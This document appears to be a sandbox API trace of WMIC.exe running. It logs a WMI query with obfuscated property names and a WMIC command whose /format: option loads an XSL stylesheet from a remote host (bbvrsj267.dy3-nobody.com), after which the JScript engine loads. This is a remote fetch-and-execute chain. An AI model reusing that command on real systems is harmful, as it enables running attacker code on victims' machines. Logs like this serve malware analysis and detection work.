[0044.407] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="__PROPERTYCOUNT", cchCount2=15) returned 3
[0044.407] lstrlenW (lpString="__RELPATH") returned 9
[0044.407] lstrlenW (lpString="Kqncmv426") returned 9
[0044.407] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="__RELPATH", cchCount2=9) returned 3
[0044.407] lstrlenW (lpString="__SERVER") returned 8
[0044.407] lstrlenW (lpString="Kqncmv426") returned 9
[0044.407] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="__SERVER", cchCount2=8) returned 3
[0044.407] lstrlenW (lpString="__SUPERCLASS") returned 12
[0044.407] lstrlenW (lpString="Kqncmv426") returned 9
[0044.407] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="__SUPERCLASS", cchCount2=12) returned 3
[0044.407] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="__CLASS", cchCount2=7) returned 3
[0044.407] lstrlenW (lpString="__DERIVATION") returned 12
[0044.407] lstrlenW (lpString="lgiet286a") returned 9
[0044.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="__DERIVATION", cchCount2=12) returned 3
[0044.408] lstrlenW (lpString="__DYNASTY") returned 9
[0044.408] lstrlenW (lpString="lgiet286a") returned 9
[0044.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="__DYNASTY", cchCount2=9) returned 3
[0044.408] lstrlenW (lpString="__GENUS") returned 7
[0044.408] lstrlenW (lpString="lgiet286a") returned 9
[0044.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="__GENUS", cchCount2=7) returned 3
[0044.408] lstrlenW (lpString="__NAMESPACE") returned 11
[0044.408] lstrlenW (lpString="lgiet286a") returned 9
[0044.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="__NAMESPACE", cchCount2=11) returned 3
[0044.408] lstrlenW (lpString="__PATH") returned 6
[0044.408] lstrlenW (lpString="lgiet286a") returned 9
[0044.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="__PATH", cchCount2=6) returned 3
[0044.408] lstrlenW (lpString="__PROPERTYCOUNT") returned 15
[0044.408] lstrlenW (lpString="lgiet286a") returned 9
[0044.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="__PROPERTYCOUNT", cchCount2=15) returned 3
[0044.408] lstrlenW (lpString="__RELPATH") returned 9
[0044.408] lstrlenW (lpString="lgiet286a") returned 9
[0044.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="__RELPATH", cchCount2=9) returned 3
[0044.408] lstrlenW (lpString="__SERVER") returned 8
[0044.408] lstrlenW (lpString="lgiet286a") returned 9
[0044.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="__SERVER", cchCount2=8) returned 3
[0044.408] lstrlenW (lpString="__SUPERCLASS") returned 12
[0044.408] lstrlenW (lpString="lgiet286a") returned 9
[0044.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="__SUPERCLASS", cchCount2=12) returned 3
[0044.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="__CLASS", cchCount2=7) returned 3
[0044.408] lstrlenW (lpString="__DERIVATION") returned 12
[0044.408] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="__DERIVATION", cchCount2=12) returned 3
[0044.408] lstrlenW (lpString="__DYNASTY") returned 9
[0044.408] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="__DYNASTY", cchCount2=9) returned 3
[0044.408] lstrlenW (lpString="__GENUS") returned 7
[0044.408] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="__GENUS", cchCount2=7) returned 3
[0044.408] lstrlenW (lpString="__NAMESPACE") returned 11
[0044.408] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="__NAMESPACE", cchCount2=11) returned 3
[0044.408] lstrlenW (lpString="__PATH") returned 6
[0044.408] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="__PATH", cchCount2=6) returned 3
[0044.409] lstrlenW (lpString="__PROPERTYCOUNT") returned 15
[0044.409] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="__PROPERTYCOUNT", cchCount2=15) returned 3
[0044.409] lstrlenW (lpString="__RELPATH") returned 9
[0044.409] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="__RELPATH", cchCount2=9) returned 3
[0044.409] lstrlenW (lpString="__SERVER") returned 8
[0044.409] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="__SERVER", cchCount2=8) returned 3
[0044.409] lstrlenW (lpString="__SUPERCLASS") returned 12
[0044.409] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="__SUPERCLASS", cchCount2=12) returned 3
[0044.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NumberOfUsers", cchCount1=13, lpString2="__CLASS", cchCount2=7) returned 3
[0044.409] lstrlenW (lpString="__DERIVATION") returned 12
[0044.409] lstrlenW (lpString="NumberOfUsers") returned 13
[0044.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NumberOfUsers", cchCount1=13, lpString2="__DERIVATION", cchCount2=12) returned 3
[0044.409] lstrlenW (lpString="__DYNASTY") returned 9
[0044.409] lstrlenW (lpString="NumberOfUsers") returned 13
[0044.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NumberOfUsers", cchCount1=13, lpString2="__DYNASTY", cchCount2=9) returned 3
[0044.409] lstrlenW (lpString="__GENUS") returned 7
[0044.409] lstrlenW (lpString="NumberOfUsers") returned 13
[0044.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NumberOfUsers", cchCount1=13, lpString2="__GENUS", cchCount2=7) returned 3
[0044.409] lstrlenW (lpString="__NAMESPACE") returned 11
[0044.409] lstrlenW (lpString="NumberOfUsers") returned 13
[0044.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NumberOfUsers", cchCount1=13, lpString2="__NAMESPACE", cchCount2=11) returned 3
[0044.409] lstrlenW (lpString="__PATH") returned 6
[0044.409] lstrlenW (lpString="NumberOfUsers") returned 13
[0044.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NumberOfUsers", cchCount1=13, lpString2="__PATH", cchCount2=6) returned 3
[0044.409] lstrlenW (lpString="__PROPERTYCOUNT") returned 15
[0044.409] lstrlenW (lpString="NumberOfUsers") returned 13
[0044.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NumberOfUsers", cchCount1=13, lpString2="__PROPERTYCOUNT", cchCount2=15) returned 3
[0044.409] lstrlenW (lpString="__RELPATH") returned 9
[0044.409] lstrlenW (lpString="NumberOfUsers") returned 13
[0044.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NumberOfUsers", cchCount1=13, lpString2="__RELPATH", cchCount2=9) returned 3
[0044.409] lstrlenW (lpString="__SERVER") returned 8
[0044.409] lstrlenW (lpString="NumberOfUsers") returned 13
[0044.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NumberOfUsers", cchCount1=13, lpString2="__SERVER", cchCount2=8) returned 3
[0044.409] lstrlenW (lpString="__SUPERCLASS") returned 12
[0044.409] lstrlenW (lpString="NumberOfUsers") returned 13
[0044.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NumberOfUsers", cchCount1=13, lpString2="__SUPERCLASS", cchCount2=12) returned 3
[0044.410] lstrlenW (lpString="Select * from Win32_OperatingSystem") returned 35
[0044.410] wcstok (in: _String="Select * from Win32_OperatingSystem", _Delimiter=" ", _Context=0x6e2edf5a | out: _String="Select", _Context=0x6e2edf5a) returned="Select"
[0044.410] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x6e2edf5a | out: _String=0x0, _Context=0x6e2edf5a) returned="*"
[0044.410] lstrlenW (lpString="FROM") returned 4
[0044.410] lstrlenW (lpString="*") returned 1
[0044.410] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1
[0044.410] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x6e2edf5a | out: _String=0x0, _Context=0x6e2edf5a) returned="from"
[0044.410] lstrlenW (lpString="FROM") returned 4
[0044.410] lstrlenW (lpString="from") returned 4
[0044.410] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2
[0044.410] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x6e2edf5a | out: _String=0x0, _Context=0x6e2edf5a) returned="Win32_OperatingSystem"
[0044.410] lstrlenA (lpString=" FROM ") returned 6
[0044.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x893ac8, cbMultiByte=-1, lpWideCharStr=0x18f0f8, cchWideChar=7 | out: lpWideCharStr=" FROM ") returned 7
[0044.410] lstrlenA (lpString="SELECT ") returned 7
[0044.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x893ab0, cbMultiByte=-1, lpWideCharStr=0x18f230, cchWideChar=8 | out: lpWideCharStr="SELECT ") returned 8
[0044.410] ??0CHString@@QAE@XZ () returned 0x12ba14
[0044.410] GetCurrentThreadId () returned 0x9a8
[0044.410] CoCreateInstance (in: rclsid=0x896ce0*(Data1=0x8d1c559d, Data2=0x84f0, Data3=0x4bb3, Data4=([0]=0xa7, [1]=0xd5, [2]=0x56, [3]=0xa7, [4]=0x43, [5]=0x5a, [6]=0x9b, [7]=0xa6)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x896d00*(Data1=0xbfbf883a, Data2=0xcad7, Data3=0x11d3, Data4=([0]=0xa1, [1]=0x1b, [2]=0x0, [3]=0x10, [4]=0x5a, [5]=0x1f, [6]=0x51, [7]=0x5a)), ppv=0x8dc1fc | out: ppv=0x8dc1fc*=0x224afd8) returned 0x0
[0044.430] ??1CHString@@QAE@XZ () returned 0x6f900504
[0044.430] ??0CHString@@QAE@XZ () returned 0x12ba14
[0044.430] GetCurrentThreadId () returned 0x9a8
[0044.430] WbemLocator:IWbemLocator:ConnectServer (in: This=0x630828, strNetworkResource="\\\\CRH2YWU7\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x8dc204 | out: ppNamespace=0x8dc204*=0x224b7f4) returned 0x0
[0044.450] CoSetProxyBlanket (pProxy=0x224b7f4, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
[0044.450] ??1CHString@@QAE@XZ () returned 0x6f900504
[0044.450] ??0CHString@@QAE@XZ () returned 0x12ba00
[0044.450] GetCurrentThreadId () returned 0x9a8
[0044.450] ??0CHString@@QAE@XZ () returned 0x12b980
[0044.450] GetCurrentThreadId () returned 0x9a8
[0044.450] CoCreateInstanceEx (in: Clsid=0x896c70*(Data1=0x674b6698, Data2=0xee92, Data3=0x11d0, Data4=([0]=0xad, [1]=0x71, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd8, [6]=0xfd, [7]=0xff)), punkOuter=0x0, dwClsCtx=0x1, pServerInfo=0x0, dwCount=0x1, pResults=0x12b96c | out: pResults=((pIID=0x896bd0*(Data1=0x44aca674, Data2=0xe8fc, Data3=0x11d0, Data4=([0]=0xa0, [1]=0x7c, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pItf=0x224b808, hr=0x0))) returned 0x0
[0044.451] ??1CHString@@QAE@XZ () returned 0x6f900504
[0044.451] IWbemServices:ExecQuery (in: This=0x224b7f4, strQueryLanguage="WQL", strQuery="SELECT Kqncmv426, lgiet286a, UUFIKrncm, NumberOfUsers FROM Win32_OperatingSystem", lFlags=48, pCtx=0x0, ppEnum=0x12b9fc | out: ppEnum=0x12b9fc*=0x224b914) returned 0x0
[0044.454] WbemContext:IWbemContext:SetValue (This=0x224b808, wszName="ExcludeSystemProperties", lFlags=0, pValue=0x12b9b4*(varType=0xb, wReserved1=0x18, wReserved2=0xba2c, wReserved3=0x12, varVal1=0x89ffff, varVal2=0x1)) returned 0x0
[0044.454] CoSetProxyBlanket (pProxy=0x224b914, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
[0044.456] IEnumWbemClassObject:Next (in: This=0x224b914, lTimeout=-1, uCount=0x1, apObjects=0x12b9f8, puReturned=0x12b9f0 | out: apObjects=0x12b9f8*=0x0, puReturned=0x12b9f0*=0x0) returned 0x80041017
[0045.451] _CxxThrowException ()
[0045.452] IUnknown:Release (This=0x224b914) returned 0x0
[0045.452] ??1CHString@@QAE@XZ () returned 0x6f900504
[0045.452] LoadStringW (in: hInstance=0x0, uID=0xb7f5, lpBuffer=0x12f30c, cchBufferMax=1024 | out: lpBuffer="Node - %1\r\n") returned 0xb
[0045.452] FormatMessageW (in: dwFlags=0x2500, lpSource=0x12f30c, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x12f308, nSize=0x0, Arguments=0x12f2f4 | out: lpBuffer="\xc3a8\x25\x4e\x6f\x64\x65\x20\x2d\x20\x25\x31\x0d\x0a") returned 0x11
[0045.452] LocalFree (hMem=0x25c3a8) returned 0x0
[0045.452] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Node - CRH2YWU7\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0045.453] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Node - CRH2YWU7\r\n", cchWideChar=-1, lpMultiByteStr=0x18e470, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Node - CRH2YWU7\r\n", lpUsedDefaultChar=0x0) returned 18
[0045.453] fprintf (in: _File=0x757a2940, _Format="%s" | out: _File=0x757a2940) returned 17
[0045.453] fflush (in: _File=0x757a2940 | out: _File=0x757a2940) returned 0
[0045.453] ??0CHString@@QAE@XZ () returned 0x12faac
[0045.453] ?Format@CHString@@QAAXPBGZZ () returned 0x18f964
[0045.453] CoCreateInstance (in: rclsid=0x896cb0*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x896c00*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0x8dc21c | out: ppv=0x8dc21c*=0x63c760) returned 0x0
[0045.455] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0x63c760, hRes=0x80041017, LocaleId=0x0, lFlags=0, MessageText=0x12fac4 | out: MessageText=0x12fac4*="Invalid query\r\n") returned 0x0
[0045.466] WbemStatusCodeText:IWbemStatusCodeText:GetFacilityCodeText (in: This=0x63c760, hRes=0x80041017, LocaleId=0x0, lFlags=0, MessageText=0x12fae8 | out: MessageText=0x12fae8*="WMI") returned 0x0
[0045.467] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Wbem", cchCount1=4, lpString2="WMI", cchCount2=3) returned 1
[0045.467] lstrlenW (lpString="WMI") returned 3
[0045.467] lstrlenW (lpString="WMI") returned 3
[0045.467] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WMI", cchCount1=3, lpString2="WMI", cchCount2=3) returned 2
[0045.467] WbemStatusCodeText:IUnknown:Release (This=0x63c760) returned 0x0
[0045.467] ??1CHString@@QAE@XZ () returned 0x1
[0045.467] ??0CHString@@QAE@XZ () returned 0x12fa24
[0045.467] CoCreateInstance (in: rclsid=0x896cb0*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x896c00*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0x8dc21c | out: ppv=0x8dc21c*=0x63c760) returned 0x0
[0045.467] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0x63c760, hRes=0x80041017, LocaleId=0x0, lFlags=0, MessageText=0x12fa3c | out: MessageText=0x12fa3c*="Invalid query\r\n") returned 0x0
[0045.468] WbemStatusCodeText:IWbemStatusCodeText:GetFacilityCodeText (in: This=0x63c760, hRes=0x80041017, LocaleId=0x0, lFlags=0, MessageText=0x12fa60 | out: MessageText=0x12fa60*="WMI") returned 0x0
[0045.468] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Wbem", cchCount1=4, lpString2="WMI", cchCount2=3) returned 1
[0045.468] lstrlenW (lpString="WMI") returned 3
[0045.468] lstrlenW (lpString="WMI") returned 3
[0045.468] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WMI", cchCount1=3, lpString2="WMI", cchCount2=3) returned 2
[0045.468] WbemStatusCodeText:IUnknown:Release (This=0x63c760) returned 0x0
[0045.468] ??1CHString@@QAE@XZ () returned 0x6f900504
[0045.468] LoadStringW (in: hInstance=0x0, uID=0xb7f3, lpBuffer=0x12f28c, cchBufferMax=1024 | out: lpBuffer="ERROR:\r\nDescription = %1") returned 0x18
[0045.468] FormatMessageW (in: dwFlags=0x2500, lpSource=0x12f28c, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x12f288, nSize=0x0, Arguments=0x12f274 | out: lpBuffer="䥈!ERROR:\r\nDescription = %1") returned 0x25
[0045.468] LocalFree (hMem=0x214948) returned 0x0
[0045.468] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Invalid query\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38
[0045.468] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Invalid query\r\n", cchWideChar=-1, lpMultiByteStr=0x18f698, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERROR:\r\nDescription = Invalid query\r\n", lpUsedDefaultChar=0x0) returned 38
[0045.468] fprintf (in: _File=0x757a2940, _Format="%s" | out: _File=0x757a2940) returned 37
[0045.468] fflush (in: _File=0x757a2940 | out: _File=0x757a2940) returned 0
[0045.468] ??0CHString@@QAE@PBG@Z () returned 0x12fb24
[0045.468] ??YCHString@@QAEABV0@PBG@Z () returned 0x12fb24
[0045.468] GetCurrentThreadId () returned 0x9a8
[0045.468] ??1CHString@@QAE@XZ () returned 0x1
[0045.468] ??0CHString@@QAE@XZ () returned 0x12fb00
[0045.468] ?Format@CHString@@QAAXPBGZZ () returned 0x17d3ffc
[0045.469] ??1CHString@@QAE@XZ () returned 0x1
[0045.469] ??0CHString@@QAE@XZ () returned 0x12fafc
[0045.469] ?Format@CHString@@QAAXPBGZZ () returned 0x18f964
[0045.469] ??0CHString@@QAE@XZ () returned 0x12fac4
[0045.469] ??0CHString@@QAE@XZ () returned 0x12fa58
[0045.469] ?Format@CHString@@QAAXPBGZZ () returned 0x18fdc4
[0045.469] ??1CHString@@QAE@XZ () returned 0x1
[0045.469] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="LIST", cchCount2=4) returned 1
[0045.469] ??1CHString@@QAE@XZ () returned 0x6f900504
[0045.469] ??0CHString@@QAE@XZ () returned 0x12fa8c
[0045.469] ?Format@CHString@@QAAXPBGZZ () returned 0x17d3ffc
[0045.470] ??1CHString@@QAE@XZ () returned 0x1
[0045.470] ??1CHString@@QAE@XZ () returned 0x1
[0045.470] WbemLocator:IUnknown:Release (This=0x224b7f4) returned 0x0
[0045.470] ?Empty@CHString@@QAEXXZ () returned 0x6f900504
[0045.477] _kbhit () returned 0x0
[0045.477] ??0CHString@@QAE@PBG@Z () returned 0x12fb04
[0045.477] ??YCHString@@QAEABV0@PBG@Z () returned 0x12fb04
[0045.477] lstrlenW (lpString="LIST") returned 4
[0045.477] lstrlenW (lpString="get") returned 3
[0045.477] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="LIST", cchCount2=4) returned 1
[0045.477] lstrlenW (lpString="ASSOC") returned 5
[0045.477] lstrlenW (lpString="get") returned 3
[0045.477] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="ASSOC", cchCount2=5) returned 3
[0045.477] lstrlenW (lpString="GET") returned 3
[0045.477] lstrlenW (lpString="get") returned 3
[0045.477] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0045.477] GetCurrentThreadId () returned 0x9a8
[0045.477] ??0CHString@@QAE@XZ () returned 0x12fa78
[0045.478] CoCreateInstance (in: rclsid=0x896d40*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x896d20*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x8dc214 | out: ppv=0x8dc214*=0x5e9bc8) returned 0x0
[0045.478] FreeThreadedDOMDocument:IXMLDOMDocument:loadXML (in: This=0x5e9bc8, bstrXML=" os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh" CRH2YWU7root\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON0x80041017Invalid query\r\nWMI", isSuccessful=0x12fa74 | out: isSuccessful=0x12fa74*=0xffff) returned 0x0
[0045.479] ??0CHString@@QAE@XZ () returned 0x12fa20
[0045.479] GetCurrentThreadId () returned 0x9a8
[0045.479] CoCreateInstance (in: rclsid=0x896d50*(Data1=0x2933bf94, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x896d30*(Data1=0x2933bf93, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x12fa10 | out: ppv=0x12fa10*=0x5e8848) returned 0x0
[0045.498] CoCreateInstance (in: rclsid=0x896d40*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x896d20*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x12fa0c | out: ppv=0x12fa0c*=0x5e8af0) returned 0x0
[0045.499] FreeThreadedDOMDocument:IXMLDOMDocument:put_async (This=0x5e8af0, async=0) returned 0x0
[0045.499] SysStringByteLen (bstr="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh.xsl") returned 0x8c
[0045.499] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x5e8af0, xmlSource=0x12f944*(varType=0x8, wReserved1=0x6409, wReserved2=0x0, wReserved3=0x0, varVal1="http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh.xsl", varVal2=0x101), isSuccessful=0x12fa00 | out: isSuccessful=0x12fa00*=0xffff) returned 0x0
[0057.796] XSLTemplate:IXSLTemplate:putref_stylesheet (This=0x5e8848, stylesheet=0x5e8af0) returned 0x0
[0058.063] GetVersion () returned 0x1db10106
[0058.063] __dllonexit () returned 0x6d2b7ecf
[0058.063] __dllonexit () returned 0x6d2b7e9b
[0058.063] __dllonexit () returned 0x6d2b7eb5
[0058.063] __dllonexit () returned 0x6d2b7f70
[0058.065] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x76da0000
[0058.065] GetProcAddress (hModule=0x76da0000, lpProcName="RegisterTraceGuidsA") returned 0x76f2fb7d
[0058.065] EtwRegisterTraceGuidsA () returned 0x0
[0058.065] GetProcAddress (hModule=0x76da0000, lpProcName="RegisterTraceGuidsA") returned 0x76f2fb7d
[0058.065] EtwRegisterTraceGuidsA () returned 0x0
[0058.065] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e0cc, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x21
[0058.066] GetProcAddress (hModule=0x76da0000, lpProcName="RegOpenKeyExA") returned 0x76db4907
[0058.066] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x12e1f0 | out: phkResult=0x12e1f0*=0x0) returned 0x2
[0058.071] GetVersion () returned 0x1db10106
[0058.071] DllGetClassObject (in: rclsid=0x212004*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), riid=0x76a6ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12e9d4 | out: ppv=0x12e9d4*=0x18fef0) returned 0x0
[0058.071] JScriptEngine5:IClassFactory:CreateInstance (in: This=0x18fef0, pUnkOuter=0x0, riid=0x12f380*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x12e9c0 | out: ppvObject=0x12e9c0*=0x17d4870) returned 0x0
[0058.071] GetUserDefaultLCID () returned 0x409
[0058.071] GetACP () returned 0x4e4
[0058.071] JScriptEngine5:IUnknown:AddRef (This=0x17d4870) returned 0x2
[0058.072] JScriptEngine5:IUnknown:Release (This=0x17d4870) returned 0x1
[0058.072] JScriptEngine5:IUnknown:Release (This=0x18fef0) returned 0x0
